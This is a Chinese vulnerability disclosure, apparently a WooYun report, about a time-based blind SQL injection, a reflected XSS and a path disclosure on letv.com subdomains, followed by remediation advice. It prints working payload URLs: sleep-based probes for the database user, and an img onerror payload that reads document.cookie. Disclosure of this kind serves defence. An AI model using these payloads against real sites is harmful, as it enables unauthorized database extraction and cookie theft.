注射点位于(参数ID):

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702

反射型XSS位于:

http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp?callback=callback__%3Cimg%20src=aaaa%20οnerrοr=alert(document.cookie)%3E&

绝对路径泄漏位于:

http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=aaaa&username=

Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11漏洞证明:

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702

可猜解当前连接用户的长度为23。

我只猜解了第一个字母的ASCII码为50,字母“2”:

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)--&_=1408792945702

非root,未进一步利用。

修复方案:

解决SQL注射

编码callback

不显示详细错误信息

乐视mysql_乐视MySQL盲注、callback反射型XSS及一处绝对路径泄漏相关推荐

  1. 便携式三星mysql_三星集团某站点MySQL盲注一枚(附python验证脚本)

    漏洞概要 缺陷编号:WooYun-2014-082219 漏洞标题:三星集团某站点MySQL盲注一枚(附python验证脚本) 相关厂商:三星集团 漏洞作者:lijiejie 提交时间:2014-11 ...

  2. mysql盲注_二十八、MySQL盲注

    在学习本实验之前,请确保已经学过"SQL注入原理与实践"这个实验. 在 SQL注入原理与实践 这个实验中,我们已经知道了SQL注入的原理,并且能够完成支持union 且有回显的注入 ...

  3. mysql盲注绕过_盲注 绕过技巧

    http://www.x.com/sections_intr.php?id=181 and length((database()))=4 http://www.x.com/sections_intr. ...

  4. mysql盲注_Mysql 布尔型盲注手工注入详解

    0x00 什么叫布尔型盲注 布尔型 布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值.一般也称为逻辑型. 盲注 在注入时页面无具体数据返回的注入称之为盲注, ...

  5. mysql盲注脱裤_记一次猥琐的脱裤

    简介 环境 php+pdo+mysql+linux FUCK IT 因为是pdo,所以支持多行,一开始只用了时间盲注跑了用户表的列出来,然后可以通过多行语句执行 updaet user set ema ...

  6. php mysql盲注_[题目]记一次利用gopher的内网mysql盲注

    进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很 ...

  7. mysql 盲注_mysql简略手工盲注技能

    mysql简略手工盲注技能 申明:固然网上对于mysql手工盲注的材料良多 然而大多都是大篇幅 语句极其庞杂 学习盲注前先懂得下 IFORMATION_SCHEMA 库 Mysql5内置的系统数据库I ...

  8. mysql盲注二分法脚本

    PS 闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本#正常页面的大小 def resLen(url):res=requests.get ...

  9. mysql盲注脱裤_白帽子挖洞—SQL注入篇

    0x00介绍 SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到 ...

最新文章

  1. OpenCV使用CUDA处理图像的教程与实战
  2. 重磅直播 | 图像对齐算法
  3. 160 - 11 Andrnalin.4
  4. Servlet实现文件上传
  5. 测试用例-写测试用例时怎么入手
  6. 《数据整理实践指南》一第2章 是我的问题还是数据的问题
  7. 图像分辨率测试—imatest
  8. SystemV 共享内存
  9. python3入门与进阶笔记_Python3入门与进阶【笔记】
  10. 面试题-java高级(答案超详细)
  11. oracle同义词删除重建,Oracle同义词的创建与删除
  12. FlowNet2.0 win10系统疑难问题解决
  13. 5分钟内完成Python键盘记录程序
  14. Mysql之视图的创建、修改、查看、删除
  15. 电脑技术员必备工具软件
  16. 短信验证码登录,以及第三方登录
  17. 【AI特训营】:柯西分布 Paddle API实现
  18. Redis几种集群模式
  19. Caused by: com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException
  20. ThinkPad T470p总是很快进入睡眠

热门文章

  1. DVD(驱动器或者视频播放器)
  2. 2022-2027年中国主题酒店行业发展监测及投资战略研究报告
  3. 【爬虫】四、基础爬虫方法实战
  4. Fikker网站加速服务器|web缓存加速基础教程 - 简介篇
  5. maven的配置教程
  6. 免费开通商户收款码和领取收款物料礼包教程
  7. 基于jquery实现自定义下拉菜单(前端开发)
  8. java 上传图片 打水印
  9. (基于安卓app开发的毕业设计)智能手机图片管理.(附源码+论文)
  10. StarUML画类图